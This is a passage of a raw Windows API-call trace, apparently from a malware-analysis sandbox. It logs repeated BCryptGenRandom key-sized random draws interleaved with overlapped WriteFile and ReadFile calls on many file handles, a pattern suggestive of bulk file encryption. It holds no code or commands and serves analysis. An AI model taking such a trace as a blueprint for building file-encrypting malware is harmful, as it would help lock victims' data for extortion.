pbBuffer=0x322fc30) returned 0x0 [0175.294] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.294] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.294] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0175.297] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.297] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.297] free (_Block=0x3e305b8) [0175.297] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.297] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.298] free (_Block=0x1fa91d0) [0175.298] free (_Block=0x1fa2ed8) [0175.298] free (_Block=0x1fa90b8) [0175.298] WriteFile (in: hFile=0x2a8, lpBuffer=0x3fb00ec*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8) returned 1 [0175.298] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0175.889] CloseHandle (hObject=0x308) returned 1 [0175.889] free (_Block=0x3e70008) [0175.889] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0175.900] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.901] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0175.901] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.901] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0175.905] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.905] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.905] free (_Block=0x3e305b8) [0175.905] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.905] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.905] free (_Block=0x1fa91d0) [0175.905] free (_Block=0x1fa2ed8) [0175.905] free (_Block=0x1fa90b8) [0175.905] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0175.906] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0175.913] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.914] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0175.914] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.914] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0175.914] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.915] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.915] free (_Block=0x3e305b8) [0175.915] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.915] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.915] free (_Block=0x1fa91d0) [0175.915] free (_Block=0x1fa2ed8) [0175.915] free (_Block=0x1fa90b8) [0175.915] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0175.915] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0176.615] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x1d70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0176.615] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0176.625] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.626] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.626] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0176.626] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.626] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.626] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0176.626] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.626] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.626] free (_Block=0x3e305b8) [0176.626] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.626] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.627] free (_Block=0x1fa91d0) [0176.627] free (_Block=0x1fa2ed8) [0176.627] free (_Block=0x1fa90b8) [0176.627] WriteFile (in: hFile=0x338, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0176.627] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0176.642] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.643] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0176.643] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.643] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0176.643] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.643] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.643] free (_Block=0x3e305b8) [0176.643] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.643] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.644] free (_Block=0x1fa91d0) [0176.644] free (_Block=0x1fa2ed8) [0176.644] free (_Block=0x1fa90b8) [0176.644] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0176.644] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0177.061] CloseHandle (hObject=0x338) returned 1 [0177.061] free (_Block=0x1ff1e60) [0177.061] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0177.091] CloseHandle (hObject=0x170) returned 1 [0177.091] free (_Block=0x3d70450) [0177.091] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0177.092] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.092] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.092] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0177.092] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.093] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.093] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0177.093] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.093] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.093] free (_Block=0x3e305b8) [0177.093] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.093] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.093] free (_Block=0x1fa91d0) [0177.093] free (_Block=0x1fa2ed8) [0177.093] free (_Block=0x1fa90b8) [0177.093] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0177.093] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0177.094] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0177.094] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0177.111] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0177.111] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0177.122] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xaa0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.122] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0177.132] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x390, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0177.133] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0177.143] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.143] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0177.151] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xaf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0177.151] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0177.164] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xa70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0177.164] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0177.172] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x30f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.172] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0177.189] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x17a20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0177.189] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0177.201] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x670, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.201] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0177.214] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0177.214] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0177.216] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x504, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.217] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0177.217] CloseHandle (hObject=0x2a8) returned 1 [0177.217] free (_Block=0x1ff1e60) [0177.217] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0177.237] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1a54, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0177.238] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0177.238] CloseHandle (hObject=0x2a8) returned 1 [0177.238] free (_Block=0x3df0008) [0177.238] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0177.270] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.270] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0177.270] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.271] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0177.271] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.271] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.271] free (_Block=0x3e305b8) [0177.271] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.271] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.272] free (_Block=0x1fa91d0) [0177.272] free (_Block=0x1fa2ed8) [0177.272] free (_Block=0x1fa90b8) [0177.272] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.272] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0177.282] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.283] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0177.283] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.284] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0177.284] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.284] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.284] free (_Block=0x3e305b8) [0177.284] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.284] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.285] free (_Block=0x1fa91d0) [0177.285] free (_Block=0x1fa2ed8) [0177.285] free (_Block=0x1fa90b8) [0177.285] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0177.285] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0177.296] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.296] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.297] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0177.297] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.297] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.297] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0177.297] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.297] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.297] free (_Block=0x3e305b8) [0177.297] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.297] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.298] free (_Block=0x1fa91d0) [0177.298] free (_Block=0x1fa2ed8) [0177.298] free (_Block=0x1fa90b8) [0177.298] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0177.298] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0177.305] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.306] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0177.306] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.307] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0177.307] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.307] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.307] free (_Block=0x3e305b8) [0177.307] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.307] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.307] free (_Block=0x1fa91d0) [0177.307] free (_Block=0x1fa2ed8) [0177.307] free (_Block=0x1fa90b8) [0177.307] WriteFile (in: hFile=0x2a4, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0177.307] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0180.462] CloseHandle (hObject=0x3cc) returned 1 [0180.465] free (_Block=0x3d70450) [0180.465] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0180.485] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2076, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0180.487] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, 